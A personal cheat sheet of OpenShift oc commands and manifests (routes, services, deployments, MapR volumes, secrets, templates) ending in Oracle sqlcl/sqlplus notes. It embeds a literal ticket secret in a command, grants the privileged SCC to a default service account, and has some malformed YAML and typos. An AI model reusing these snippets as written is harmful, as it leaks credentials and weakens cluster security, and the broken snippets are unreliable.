# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-headers-
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-methods-
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-origin-

## doesn't work - 11
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-headers='X-Requested-By; Authorization; Content-Type'
# oc annotate route $ROUTE_NAME --overwrite=true "haproxy.router.openshift.io/hsts_header"="access-control-allow-origin=*;access-control-allow-credentials=true;includeSubDomains;preload"

route sticky session

apache webserver sticky sessions

router.openshift.io/cookie_name: any-name
curl -H "Cookie: any-name=fdc001aa7c2449755d6169; path=/; HttpOnly; Secure; SameSite=None" my-ocp-route.url

or to use for direct connection to the service

haproxy.router.openshift.io/balance: source

get all information about current project, show all resources

oc get all
oc get deployment,pod,service,route,dc,pvc,secret -l deployment_name=name-of-my-deployment
oc get route/name-of-route --output json

restart pod

oc rollout latest "deploy-config-example"

restart deployment config

# DC_NAME - name of the Deployment/DeploymentConfig
oc rollout status dc $DC_NAME
oc rollout history dc $DC_NAME
oc rollout latest dc/$DC_NAME

oc get deployment $DC_NAME -o yaml | grep deployment | grep revision

service

get services

oc get services

service curl inside OCP

curl http://${SERVICE_NAME}:${SERVICE_PORT}/data-api/v1/health/

service migration

FILE_NAME=service-data-portal.yaml
oc get service/my_service --output yaml > $FILE_NAME
echo "vim $FILE_NAME" | clipboard
yq 'del(.metadata.managedFields,.status,.metadata.uid,.metadata.resourceVersion,.metadata.creationTimestamp,.spec.clusterIP,.spec.clusterIPs),(.metadata.namespace="my_new_namespace")' $FILE_NAME | clipboard

print all accounts

oc get serviceaccounts

print all roles, check assigned roles, get users, list of users

oc get rolebindings

add role to current project, assign role to project, remove role from user

oc project
oc policy add-role-to-user admin cherkavi
# oc policy remove-role-from-user admin cherkavi
oc get rolebindings

create project

oc get projects
oc new-project {project name}
oc describe project {project name}

images internal registry get images

oc get images
oc get images.image.openshift.io
# don't forget: `oc get is`

image import docker import to internal registry

IMAGE_OCP=image-registry.openshift-registry.svc:5000/portal-test-env/openjdk-8-slim-enhanced:ver1
IMAGE_EXTERNAL=nexus-shared.com/repository/uploadimages/openjdk-8-slim-enhanced:202110
oc import-image $IMAGE_OCP --reference-policy='local' --from=$IMAGE_EXTERNAL --confirm
oc import-image approved-apache --from=bitnami/apache:2.4 --confirm
oc import-image my-python --from=my-external.com/tdonohue/python-hello-world:latest --confirm

# if you have credential restrictions
# oc create secret docker-registry my-mars-secret --docker-server=registry.marsrover.space --docker-username="[email protected]" --docker-password=thepasswordishere

!!! in case of any errors in process creation, pay attention to output of pods/....-build

build configs for images

oc get bc
oc describe bc/user-portal-dockerbuild 

tag image stream tag image

oc tag my-external.com/tdonohue/python-hello-world:latest my-python:latest
# Tag a specific image
oc tag openshift/ruby@sha256:6b646fa6bf5e5e4c7fa41056c27910e679c03ebe7f93e361e6515a9da7e258cc yourproject/ruby:tip

# Tag an external container image
oc tag --source=docker openshift/origin-control-plane:latest yourproject/ruby:tip

# check tag
oc get is

pod image sources pod docker image sources

just an example from real cluster

             │       ┌─────────┐
 LOCAL       │       │ Nexus   │
     ┌───────┼──1────► docker  ├────┐───────┐
     │       │       │ storage │    │       │
     │       │       └─────────┘    3       4
     │       │                      │       │
┌────┴─────┐ ├──────────────────────┼───────┼─
│  docker  │ │    OpenShift         │       │
└────┬─────┘ │                  ┌───▼──┐    │
     │       │ ┌─────────┐      │Image │    │
     │       │ │OpenShift│      │Stream│    │
     └──2────┼─►registry │      └─┬────┘    │
             │ └────┬────┘        5         │
             │      │        ┌────▼─┐       │
             │      └────6───► POD  ◄───────┘
                             └──────┘
  1. docker push
  2. docker push
  3. import-image

image stream build

in case of "no log output" during the input stream creation - check "-build" image not in "terminating" state

print current project

oc project

project select, select project

oc project {project name}

create resource ( pod, job, volume ... )

oc create -f {description file}
# oc replace -f {description file}

example of route

oc create inline oc document here

cat <<EOF | oc apply -f -
apiVersion: route.openshift.io/v1
kind: Route
metadata:
  name: $ROUTE_NAME
spec:
  host: $ROUTE_NAME-stg-3.vantage.zur
  to:
    kind: Service
    name: $ROUTE_NAME
  port:
    targetPort: 9090
  tls:
    insecureEdgeTerminationPolicy: None
    termination: edge
EOF

example of job

apiVersion: batch/v1
kind: Job
metadata:
  name: scenario-description
spec:
  nodeSelector:         
    composer: true
  template:         
    spec:
      containers:
      - name: scenario-description
        image: cc-artifactory.myserver.net/add-docker/scenario_description:0.23.3
        command: ["python", "-c", "'import scenario_description'"]
        env:
          - name: MAPR_TICKETFILE_LOCATION
            value: "/tmp/maprticket_202208"        
          # set environment variable from metadata
          - name: PROJECT
            valueFrom:
              fieldRef:
                fieldPath: metadata.namespace            
            - name: MAPR_TZ
              valueFrom:
                configMapKeyRef:
                  name: environmental-vars
                  key: MAPR_TZ
            - name: POSTGRES_USER
              valueFrom:
                secretKeyRef:
                  name: postgresqlservice
                  key: database-user                
      restartPolicy: Never
  backoffLimit: 4

image

  1. secret to env
          env:
            - name: POSTGRESUSER
              valueFrom:
                secretKeyRef:
                  name: postgresql-service
                  key: database-user
  1. configmap to env
          env:
            - name: MAPRCLUSTER
              valueFrom:
                configMapKeyRef:
                  name: env-vars
                  key: MAPR_CLUSTER
    envFrom:
    - configMapRef:
        name: session-config-map
    - secretRef:
        name: session-secret
  1. secret to file
    spec:
      volumes:
        - name: mapr-ticket
          secret:
            secretName: mapr-ticket
            defaultMode: 420
...
          volumeMounts:
            - name: mapr-ticket
              readOnly: true
              mountPath: /users-folder/maprticket
  1. configmap to file
    spec:
      volumes:
        - name: logging-config-volume
          configMap:
            name: log4j2-config
            defaultMode: 420
...
          volumeMounts:
            - name: logging-config-volume
              mountPath: /usr/src/config

set resource limits

oc set resources dc/{app-name} --limits=cpu=400m,memory=512Mi --requests=cpu=200m,memory=256Mi
oc autoscale dc/{app-name} --min 1 --max 5 --cpu-percent=40

connect to existing pod in debug mode, debug pod

# check policy
# oc adm policy add-scc-to-user mapr-apps-scc system:serviceaccount:${PROJECT_NAME}:default
# oc adm policy add-role-to-user admin ${USER_NAME} -n ${PROJECT_NAME}

oc debug pods/{name of the pod}
oc debug dc/my-dc-config --as-root --namespace my-project

# start container after fail
oc rollout latest {dc name}
# stop container after fail
oc rollback latest {dc name}

connect to existing pod, execute command on remote pod, oc exec

oc get pods --field-selector=status.phase=Running
oc rsh <name of pod>
oc rsh -c <container name> pod/<pod name>

# connect to container inside the pod with multi container
POD_NAME=data-portal-67-dx
CONTAINER_NAME=data-portal-apache
oc exec -it -p $POD_NAME -c $CONTAINER_NAME /bin/bash
# or 
oc exec -it $POD_NAME -c $CONTAINER_NAME /bin/bash

execute command in pod command

# example of executing program on pod: kafka-test-app
oc exec kafka-test-app "/usr/bin/java"

get environment variables

oc set env pod/$POD_DATA_API --list

copy file

# copy file from pod
oc cp <local_path> <pod_name>:/<path> -c <container_name>  
oc cp api-server-256-txa8n:usr/src/cert/keystore_server /my/local/path
# for OCP4 we should NOT to use leading slash like /usr/src.... 

# copy files from POD to locally 
oc rsync /my/local/folder/ test01-mz2rf:/opt/app-root/src/

# copy file to pod
oc cp <pod_name>:/<path>  -c <container_name><local_path>  

forward port forwarding

oc port-forward <pod-name> <ext-port>:<int-port>
function oc-port-forwarding(){
    if [[ $# != 3 ]]
    then
        echo "port forwarding for remote pods with arguments:"
        echo "1. project-name, like 'portal-stg-8' "
        echo "2. pod part of the name, like 'collector'"
        echo "3. port number like 5005"
        return 1
    fi

	oc login -u $USER_DATA_API_USER -p $USER_DATA_API_PASSWORD $OPEN_SHIFT_URL
	oc project $1
    POD_NAME=$(oc get pods | grep Running | grep $2 | awk '{print $1}')
    echo $POD_NAME
    oc port-forward $POD_NAME $3:$3
}

new app with "default" container

oc new-app {/local/folder/to_source}

new app with "default" container from GIT

oc new-app https://github.com/openshift/ruby-ex.git

new app with "specific" (centos/ruby-22-centos7) docker container from GIT

oc new-app centos/ruby-22-centos7~https://github.com/openshift/ruby-ex.git

new app with "specific" (centos/ruby-22-centos7) docker container from GIT with specific sub-folder and name

oc new-app centos/ruby-22-centos7~https://github.com/openshift/ruby-ex.git --context-dir=sub-project --name myruby

openshift new application create and check

OC_APP_NAME=python-test
OC_PROJECT_NAME=my-project
OC_ROOT=app.vantage.ubs

# cleanup before creation
oc delete route $OC_APP_NAME
oc delete service $OC_APP_NAME
oc delete deployment $OC_APP_NAME
oc delete buildconfigs.build.openshift.io $OC_APP_NAME

# create new oc application from source code
oc new-app https://github.com/cherkavi/python-deployment.git#main --name=$OC_APP_NAME

# check deployment
oc get service $OC_APP_NAME -o yaml
oc get deployment $OC_APP_NAME -o yaml
oc get buildconfigs.build.openshift.io $OC_APP_NAME -o yaml

# create route
oc create route edge $OC_APP_NAME --service=$OC_APP_NAME
# check route: tls.termination: edge
oc get route $OC_APP_NAME -o yaml

curl -X GET https://${OC_APP_NAME}-${OC_PROJECT_NAME}.${OC_ROOT}/

create ocp route

oc-login devops user_cherkashyn
OC_POD_NAME=masker-service-152-lp5n2a
OC_SERVICE_NAME=masker-service-direct
OC_SERVICE_PORT=8080
OC_ROUTE_NAME=$OC_SERVICE_NAME

oc expose pod $OC_POD_NAME --name $OC_SERVICE_NAME
oc get services | grep $OC_SERVICE_NAME
## insecure options only, no TLS termination
# oc expose service $OC_SERVICE_NAME --name=$OC_ROUTE_NAME
## spec.tls.insecureEdgeTerminationPolicy: Redirect
oc create route edge $OC_ROUTE_NAME --service=$OC_SERVICE_NAME --port=$OC_SERVICE_PORT  --insecure-policy Redirect
ROUTE_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03

# oc create inline  oc document here
cat <<EOF | oc apply -f -
apiVersion: route.openshift.io/v1
kind: Route
metadata:
  name: $ROUTE_NAME
spec:
  host: $ROUTE_NAME-stg-3.vantage.zu
  to:
    kind: Service
    name: $ROUTE_NAME
  port:
    targetPort: 9090
  tls:
    insecureEdgeTerminationPolicy: None
    termination: edge
EOF

# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/balance='source'
oc annotate --overwrite route $ROUTE_NAME haproxy.router.openshift.io/ip_header='X-Real-IP'
# oc annotate --overwrite route $ROUTE_NAME haproxy.router.openshift.io/balance='leastconn'
# # roundrobin
# 
oc get route $ROUTE_NAME -o yaml
# oc delete route $ROUTE_NAME
# 
#         +---------+
#         | route  |-+
#  +------+        |-+
# host    +----+----+   +-----------+
#              |        | service   |
#              +---------> / host   |
#                       |           |
#                       +-----------+
#                   targetPort


apiVersion: route.openshift.io/v1
kind: Route
metadata:
  name: parking-page
spec:
  host: application.vantage.zur
  to:
    kind: Service
    name: parking-page 
  port:
    targetPort: 9191
  tls:
    insecureEdgeTerminationPolicy: None
    termination: edge

service example

# get <labels> for pointing out to pod(s)
oc get pods <unique pod name> -o json | jq -r .metadata.labels
SERVICE_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03

cat <<EOF | oc apply -f -
apiVersion: v1
kind: Service
metadata:
  name: $SERVICE_NAME
  namespace: $OCP_PROJECT
spec:
  ports:
  - name: 9090-tcp
    port: 9090
    protocol: TCP
    targetPort: 9090
  selector:
    app: $SERVICE_NAME
  sessionAffinity: None  
  type: ClusterIP
EOF
#        +----------+
#        | service  |-+
#  +-----+          |-+
# port   +-----+----+   +---------------+
#              |        | * deployment  |
#              +--------> * depl.config |
#                       | * <labels>    |
#                       +---------------+
#                   targetPort
# 

apiVersion: v1
kind: Service
metadata:
  name: parking-page
  namespace: project-portal
spec:
  ports:
  - name: 9191-tcp
    port: 9191
    protocol: TCP
    targetPort: 9191
  selector:
    deploymentconfig: parking-service
  sessionAffinity: None
  type: ClusterIP

possible solution for providing external ip address of the client ( remote_addr )

  ## ----------
  type: ClusterIP

  ## ----------
  # externalTrafficPolicy: Local
  # type: LoadBalancer

start pod, pod example

DEPLOYMENT_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03
CONTAINER_URI=default-route-openshift-image-registry.vantage.zu/simple-application-staging-03/maprtech_pacc_python3:20230829

cat <<EOF | oc apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
    name: $DEPLOYMENT_NAME
spec:
    # replicas: 3
    selector:
        matchLabels:
            app: $DEPLOYMENT_NAME
    template:
        metadata:
            labels:
                app: $DEPLOYMENT_NAME
        spec:
            containers:
            - name: html-container
              image: $CONTAINER_URI
              command: ["sleep", "3600"]
              ports:
                - containerPort: 9090
EOF

oc get deployment $DEPLOYMENT_NAME -o yaml
# oc delete deployment $DEPLOYMENT_NAME

import specific image

oc import-image jenkins:v3.7 --from='registry.access.redhat.com/openshift3/jenkins-2-rhel7:v3.7' --confirm -n openshift

inside pod start python application on specific port

  1. create python application
# cat <<EOF > app.py
from http.server import BaseHTTPRequestHandler, HTTPServer

class CustomRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html"); self.end_headers() # curl: (1) Received HTTP/0.9 when not allowed
        
        self.wfile.write(f"remote_addr:{self.client_address[0]} <br />\n".encode("utf-8"))
        self.wfile.write(f"HTTP_X_CLIENT_IP   {self.headers['HTTP_X_CLIENT_IP']} <br />\n".encode("utf-8"))
        self.wfile.write(f"HTTP_X_FORWARDED_FOR   {self.headers['HTTP_X_FORWARDED_FOR']} <br />\n".encode("utf-8"))
        for each_header in self.headers:
            self.wfile.write(f"{each_header}   {self.headers[each_header]} <br />\n".encode("utf-8"))

if __name__ == '__main__':
    server_address = ('', 9090)
    httpd = HTTPServer(server_address, CustomRequestHandler)
    print('Server is running on http://localhost:9090')
    httpd.serve_forever()
EOF
  1. copy source code to the container
DEPLOYMENT_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03

pod_name=`oc get pods | grep Running | grep $DEPLOYMENT_NAME | awk '{print $1}'`
oc cp app.py $pod_name:/app.py
oc rsh $pod_name
bash
cat app.py
python3 app.py
  1. execute curl request to route
curl https://sticky-sessions-stg-3.vantage.zu

log from

oc logs pod/{name of pod}
oc logs -c <container> pods/<pod-name>
oc logs --follow bc/{name of app}

describe resource, information about resource

oc describe job {job name}
oc describe pod {pod name}

edit resource

export EDITOR=vim
oc edit pv pv-my-own-volume-1

or

oc patch pv/pv-my-own-volume-1 --type json -p '[{ "op": "remove", "path": "/spec/claimRef" }]'

debug pod

oc debug deploymentconfig/$OC_DEPL_CONFIG -c $OC_CONTAINER_NAME --namespace $OC_NAMESPACE

container error pod error

config map

# list of config maps
oc get configmap

# describe one of the config map 
oc get configmaps "httpd-config" -o yaml
oc describe configmap data-api-config
oc describe configmap gatekeeper-config

oc create configmap httpd-config-2 --from-file=httpd.conf=my-file-in-current-folder.txt

Grant permission to be able to access OpenShift REST API and discover services.

oc policy add-role-to-user view -n {name of application/namespace} -z default

information about current configuration

oc config view

the same as

cat ~/.kube/config/config

check accessible applications, ulr to application, application path

oc describe routes

Requested Host:

delete/remove information about some entities into project

oc delete {type} {type name}
  • buildconfigs
  • services
  • routes
  • ...

Isio external service exposing

oc get svc istio-ingressgateway -n istio-system

expose services

if your service looks like svc/web - 172.30.20.243:8080 instead of external link like: http://gateway-myproject.192.168.42.43.nip.io to pod port 8080 (svc/gateway), then you can "expose" it for external world:

  • svn expose services/{app name}
  • svn expose service/{app name}
  • svn expose svc/{app name}

Liveness and readiness probes

# set readiness/liveness
oc set probe dc/{app-name} --liveness --readiness --get-url=http://:8080/health
# remove readiness/liveness
oc set probe dc/{app-name} --remove --liveness --readiness --get-url=http://:8080/health
# oc set probe dc/{app-name} --remove --liveness --readiness --get-url=http://:8080/health --initial-delay-seconds=30
 
# Set a readiness probe to try to open a TCP socket on 3306
oc set probe rc/mysql --readiness --open-tcp=3306

Readiness probe will stop after first positive check
Liveness probe will be executed again and again (period) during container lifetime
image

current ip address

minishift ip

open web console

minishift console

Kubernetes

print all context

kubectl config get-contexts

pring current context

kubectl config current-context

api version

kubectl api-versions

--> Success Build scheduled, use 'oc logs -f bc/web' to track its progress. Application is not exposed. You can expose services to the outside world by executing one or more of the commands below: 'oc expose svc/web' Run 'oc status' to view your app.

job example

!!! openshift job starts only command - job will skip entrypoint

apiVersion: batch/v1
kind: Job
metadata:
  name: test-job-traceroute
spec:
  nodeSelector:         
    composer: true
  template:         
    spec:
      containers:
      - name: busybox
        image: busybox
        command: ["traceroute", "cc-art.group.net"]
          
      restartPolicy: Never
  backoffLimit: 4		
apiVersion: batch/v1
kind: Job
metadata:
  name: scenario-description
spec:
  template:         
    spec:
      containers:
      - name: scenario-description
        image: scenario_description:0.2.3
        command: ["python", "-c", "'import scenario_description'"]
      restartPolicy: Never

pod example simple pod minimal pod infinite pod running

apiVersion: v1
kind: Pod
metadata:
  name: test01
spec:
  containers:
  - name: test01
    image: busybox
    command: ["sleep", "36000"]
  restartPolicy: Never
  backoffLimit: 4

pod sidecar

apiVersion: v1
kind: Pod
metadata:
  name: test01
spec:
  containers:
  - name: test01
    image: busybox
    command: ["sleep", "36000"]
  - name: test02
    image: busybox
    command: ["sleep", "36000"]
  restartPolicy: Never
  backoffLimit: 4

pod with mapping

apiVersion: v1
kind: Pod
metadata:
  name: connect-to-me
spec:
  containers:
  - name: just-a-example
    image: busybox
    command: ["sleep", "36000"]
    volumeMounts:
    - mountPath: /source
      name: maprvolume-source
    - mountPath: /destination
      name: maprvolume-destination
    - name: httpd-config-volume
      mountPath: /usr/local/apache2/conf/httpd.conf      
    - name: kube-api-access-q55
      readOnly: true
      mountPath: /var/run/secrets/kubernetes.io/serviceaccount  
  volumes:
  - name: maprvolume-source
    persistentVolumeClaim:
      claimName: pvc-scenario-input-prod
  - name: maprvolume-destination
    persistentVolumeClaim:
      claimName: pvc-scenario-output-prod
  - name: httpd-config-volume
    configMap:
      name: httpd-config
      defaultMode: 420      
  - name: kube-api-access-q55
    projected:
      sources:
        - serviceAccountToken:
            expirationSeconds: 3607
            path: token
        - configMap:
            name: kube-root-ca.crt
            items:
             - key: ca.crt
                  path: ca.crt
        - downwardAPI:
            items:
              - path: namespace
                fieldRef:
                  apiVersion: v1
                  fieldPath: metadata.namespace
        - configMap:
            name: openshift-service-ca.crt
            items:
              - key: service-ca.crt
                path: service-ca.crt
        defaultMode: 420
  restartPolicy: Never
  backoffLimit: 4

Persistent Volume with Persistent Volume Claim example

For MapR cluster, be aware about MapR ticket-file ----<>Secret-----<>PV------<>PVC

pv mapr

kind: PersistentVolume
apiVersion: v1
metadata:
  name: pv-workloads-staging-01
spec:
  capacity:
    storage: 50Gi
  csi:
    driver: com.mapr.csi-kdf
    volumeHandle: pv-workloads-staging-01
    volumeAttributes:
      cldbHosts: >-
        dpmtjp0001.swiss.com dpmtjp0002.swiss.com
        dpmtjp0003.swiss.com dpmtjp0004.swiss.com
      cluster: dp.stg.swiss
      platinum: 'false'
      securityType: secure
      volumePath: /data/reprocessed/sensor
    nodePublishSecretRef:
      name: hil-supplier-01
      namespace: workloads-staging
  accessModes:
    - ReadWriteMany
  claimRef:
    kind: PersistentVolumeClaim
    namespace: workloads-staging
    name: pvc-supplier-01
  persistentVolumeReclaimPolicy: Retain
  volumeMode: Filesystem
status:
  phase: Bound
kind: PersistentVolume
apiVersion: v1
metadata:
  name: pv-mapr-tmp
spec:
  capacity:
    storage: 10Gi
  csi:
    driver: com.mapr.csi-kdf
    volumeHandle: pv-mapr-tmp
    volumeAttributes:
      cldbHosts: >-
        esp000004.swiss.org esp000007.swiss.org
        esp000009.swiss.org esp000010.swiss.org
      cluster: prod.zurich
      securityType: secure
      volumePath: /tmp/
    nodePublishSecretRef:
      name: mapr-secret
      namespace: pre-prod
  accessModes:
    - ReadWriteMany
  claimRef:
    kind: PersistentVolumeClaim
    namespace: pre-prod
    name: pvc-mapr-tmp
    apiVersion: v1
  persistentVolumeReclaimPolicy: Delete
  volumeMode: Filesystem
status:
  phase: Bound

if you are going to edit/change PV you should:

  1. remove PV
  2. remove PVC
  3. remove all Workloads, that are using it ( decrease amount of PODs in running config )

create secret token if it not exist

creating secret

  • login into mapr
echo $CLUSTER_PASSWORD | maprlogin password -user $CLUSTER_USER
  • check secret for existence
oc get secrets -n $OPENSHIFT_NAMESPACE
  • re-create secret
# delete secret 
oc delete secret/volume-token-ground-truth
cat /tmp/maprticket_1000

# create secret from file
ticket_name="cluster-user--mapr-prd-ticket-1536064"
file_name=$ticket_name".txt"
project_name="tsa"
## copy file from cluster to local folder
scp -r [email protected]:/full/path/to/$file_name .
oc create secret generic $ticket_name --from-file=$file_name -n $OPENSHIFT_NAMESPACE
oc create secret generic volume-token-ground-truth --from-file=CONTAINER_TICKET=/tmp/maprticket_1000 -n $OPENSHIFT_NAMESPACE
oc create secret generic volume-token-ground-truth --from-literal=CONTAINER_TICKET='dp.prod.zurich qEnHLE7UaW81NJaDehSH4HX+m9kcSg1UC5AzLO8HJTjhfJKrQWdHd82Aj0swwb3AsxLg==' -n $OPENSHIFT_NAMESPACE
  • check created ticket
maprlogin print -ticketfile /tmp/maprticket_1000
oc describe secret volume-token-ground-truth

map volume with ocp-secret

apiVersion: v1
kind: PersistentVolume
metadata:
  name: pv-scenario-extraction-input
  namespace: scenario-extraction
spec:
  capacity:
    storage: 1Gi
  accessModes:
    - ReadWriteMany
  claimRef:
    namespace: scenario-extraction
    name: pvc-scenario-extraction-input
  flexVolume:
    driver: "mapr.com/maprfs"
    options:
      platinum: "false"
      cluster: "dp.prod.munich"
      cldbHosts: "dpmesp000004.gedp.org dpmesp000007.gedp.org dpmesp000010.gedp.org dpmesp000009.gedp.org"
      volumePath: "/tage/data/store/processed/ground-truth/"
      securityType: "secure"
      ticketSecretName: "volume-token-ground-truth"
      ticketSecretNamespace: "scenario-extraction"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-scenario-extraction-input
  namespace: scenario-extraction
spec:
  accessModes:
    - ReadWriteOnce
  volumeName: pv-scenario-extraction-input
  resources:
    requests:
      storage: 1G

map volume with ocp-secret

apiVersion: v1
kind: PersistentVolume
metadata:
  name: foxglove-pv
spec:
  accessModes:
  - ReadWriteMany
  capacity:
    storage: 5Gi
  csi:
    driver: com.mapr.csi-kdf
    nodePublishSecretRef:
      name: mapr-prod-ticket-secret
      namespace: foxglove
    volumeAttributes:
      cldbHosts: ubs000004.vantage.org ubs000007.vantage.org        
      cluster: ubs.prod.zurich
      platinum: "false"
      securityType: secure
      volumePath: /vantage/data/store/processed/foxglove
    volumeHandle: foxglove-pv
  persistentVolumeReclaimPolicy: Retain
  volumeMode: Filesystem

service example

SERVICE_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03

cat <<EOF | oc apply -f -
apiVersion: v1
kind: Service
metadata:
  name: $SERVICE_NAME
  namespace: $OCP_PROJECT
spec:
  ports:
  - name: 9090-tcp
    port: 9090
    protocol: TCP
    targetPort: 9090
  selector:
    app: $SERVICE_NAME
  sessionAffinity: None  
  type: ClusterIP
EOF


sessionAffinity: None
type: ClusterIP
type: LoadBalancer 


oc get service $SERVICE_NAME -o yaml
# oc delete service $SERVICE_NAME
apiVersion: apps/v1
kind: Deployment
metadata:
  name: flask-pod
spec:
  selector:
    matchLabels:
      run: my-flask
  replicas: 1
  template:
    metadata:
      labels:
        run: my-flask
    spec:
      containers:
      - name: flask-test
        image: docker-registry.zur.local:5000/test-flask:0.0.1
        command: ["sleep","3600"]
        ports:
        - containerPort: 5000
---
apiVersion: v1
kind: Service
metadata:
  name: flask-service
  labels:
    run: my-flask
spec:
  ports:
  - name: flask
    port: 5000
    protocol: TCP
  - name: apache
    port: 9090
    protocol: TCP
    targetPort: 80
  selector:
    run: my-flask

Deployment config max parameters for starting pods with long startup time

# rule:
# readiness_probe.initial_delay_seconds <=  stategy.rollingParams.timeoutSeconds

stategy
  rollingParams
    timeoutSeconds: 1500

readiness_probe:
  initial_delay_seconds: 600

mounting types volum mounting

  volumeMounts:
    - { mountPath: /tmp/maprticket,                                name: mapr-ticket, readonly: true }
    - { mountPath: /usr/src/classes/config/server,                 name: server-config-volume, readonly: false }
    - { mountPath: /mapr/prod.zurich/vantage/data/store/processed, name: processed, readonly: false }
    - { mountPath: /tmp/data-api,                                  name: cache-volume, readonly: false }
  volumes:
    - { type: secret,    name: mapr-ticket,           secretName: mapr-ticket }
    - { type: configMap, name: server-config-volume, config_map_name: server-config }
    - { type: other,     name: mapr-deploy-data-api}
    - { type: pvc,       name: processed,            pvc_name: pvc-mapr-processed-prod }
    - { type: emptyDir,  name: cache-volume }

access commands permissions granting

check permission

oc get scc

for mapr container you should see:

  • adasng: false(["NET_ADMIN", "SETGID", "SETUID"])
  • anyuid: true("SYS_CHROOT")
  • mapr-ars-scc: false()
  • privileged: true(["*"])

add permissions

oc adm policy add-scc-to-user privileged -z default -n my-ocp-project

add security context constraint

oc adm policy add-scc-to-user {name of policy} { name of project }
oc adm policy remove-scc-to-user {name of policy} { name of project }

OC templating

openshift template parking page for the application

apiVersion: v1
kind: Template
metadata:
  name: parking-page
  annotations:
    description: "template for creating parking page "
    tags: "maintenance,downtime"
parameters:
  - name: CONFIG_NAME
    required: true 
    description: name for route,service,deployment,configmap
  - name: CONFIG_LABEL
    description: label for deployment,service
    required: true 
  - name: EXTERNAL_URL
    description: full url to route
    required: true 
  - name: HTML_MESSAGE
    description: html message below 'Maintenance'
    value: 08:00 .. 17:00
    required: false
  - name: WEBSERVER_IMAGE
    description: full url to httpd image in OpenShift
    required: true

objects:
  - apiVersion: v1
    kind: ConfigMap
    metadata:
      name: ${CONFIG_NAME}
    data:
      index.html: |
        <!DOCTYPE html>
        <html>
        <head>
          <title>DataPortal</title>
        </head>
        <body>
          <center>
            <h1>Maintenance</h1>
            <h2>${HTML_MESSAGE}</h2>
          </center>
        </body>
        </html>

  - apiVersion: apps/v1
    kind: Deployment
    metadata:
      name: ${CONFIG_NAME}
    spec:
      selector:
        matchLabels:
          app: ${CONFIG_LABEL}
      template:
        metadata:
          labels:
            app: ${CONFIG_LABEL}
        spec:
          containers:
            - name: html-container
              image: ${WEBSERVER_IMAGE}
              # command: ["sleep", "3600"]
              ports:
                - containerPort: 80
              volumeMounts:
                - name: html-volume
                  mountPath: /usr/local/apache2/htdocs
        # example with nginx
        # spec:
        #   containers:
        #     - name: html-container
        #       image: ${WEBSERVER_IMAGE}
        #       volumeMounts:
        #         - name: html-volume
        #           mountPath: /usr/share/nginx/html
          volumes:
            - name: html-volume
              configMap:
                name: ${CONFIG_NAME}

  - apiVersion: v1
    kind: Service
    metadata:
      name: ${CONFIG_NAME}
    spec:
      selector:
        app: ${CONFIG_LABEL}
      ports:
        - protocol: TCP
          port: 80
          targetPort: 80
      type: ClusterIP

  - apiVersion: route.openshift.io/v1
    kind: Route
    metadata:
      name: ${CONFIG_NAME}
    spec:
      host: ${EXTERNAL_URL}
      to:
        kind: Service
        name: ${CONFIG_NAME}
      port:
        targetPort: 80
      tls:
        insecureEdgeTerminationPolicy: None
        termination: edge
# list of all parameters
oc process --parameters -f parking-page.yaml 
# generate output
PROCESS_COMMAND='oc process -f parking-page.yaml -o yaml -p CONFIG_NAME=parking-page -p CONFIG_LABEL=parking-html -p EXTERNAL_URL=parking-page.app.ubsbank.zur -p WEBSERVER_IMAGE=image-registry.app.ubsbank.zur/stg/httpd:2.4'
$PROCESS_COMMAND
# create objects from tempale
$PROCESS_COMMAND | oc create -f -
# delete objects from tempale
$PROCESS_COMMAND | oc delete -f -

Oracle cheat sheet

jdbc driver to download

ddl er diagrams schema visualizer

oracle cli, sql developer command line console cli

sqlcl

sudo apt -y install sqlcl-package

or manually via webui

ORACLE_USER=my_login
ORACLE_PASS='my_pass'
ORACLE_HOST=my_host
ORACLE_PORT=1953
ORACLE_SID=prima2
/home/soft/sqlcl/bin/sql ${ORACLE_USER}/${ORACLE_PASS}@${ORACLE_HOST}:${ORACLE_PORT}:${ORACLE_SID}
# /home/soft/sqlcl/bin/sql ${ORACLE_USER}/${ORACLE_PASS}@${ORACLE_HOST}:${ORACLE_PORT}/${ORACLE_SERVICE}

update settings

# config file 
cat ${HOME}/.sqlcl/config
-- or inside sqlcl
SHOW SQLPATH;
set long 50000;
SET LIN[ESIZE] 200
set termout off
set verify off
set trimspool on
set linesize 200
set longchunksize 200000
set long 200000
set pages 0
column txt format a120
set heading off
spool out.txt
spool off

capture/catch/write output of sql query to file via terminal

script sql-command.output

sql .... 

exit
cat sql-command.output
# JDBC_DRIVER='oracle.jdbc.driver.OracleDrive'
JDBC_URL="jdbc:oracle:thin:@${JDBC_HOST}:${JDBC_PORT}:${JDBC_SERVICE}"
java -cp "/home/soft/sqlline/*" sqlline.SqlLine -u "${JDBC_URL}" -n "${JDBC_USER}" -p "${JDBC_PASS}"

sqlplus

# https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html
# download basic
# download sql*plus
sudo apt-get install alien
sudo alien -i oracle-instantclient*-basic*.rpm
sudo alien -i oracle-instantclient*-sqlplus*.rpm

# ll /usr/lib/oracle
# ll /usr/lib/oracle/21/client64

export CLIENT_HOME=/usr/lib/oracle/21/client64
export LD_LIBRARY_PATH=$CLIENT_HOME/lib
export PATH=$PATH:$CLIENT_HOME/bin

sqlplus

DDL

select DBMS_LOB.substr(dbms_metadata.get_ddl('TABLE', 'my_table'), 3000, 1) from dual;
select dbms_metadata.get_ddl('TABLE', 'my_table') from dual;

using date

case( column_1 as Timestamp )

sql plus length of the lines

set len 200

sql plus hot keys

/ l

sql plus, execute file and exit

echo exit | sqlplus user/pass@connect @scriptfilename

length of blob, len of clob

dbms_lob.getlength()

order by records desc, last record from table, limit amount of records to show

select * from ( SELECT * FROM TABLE order by rownum desc) where rownum=1;

search into all tab columns

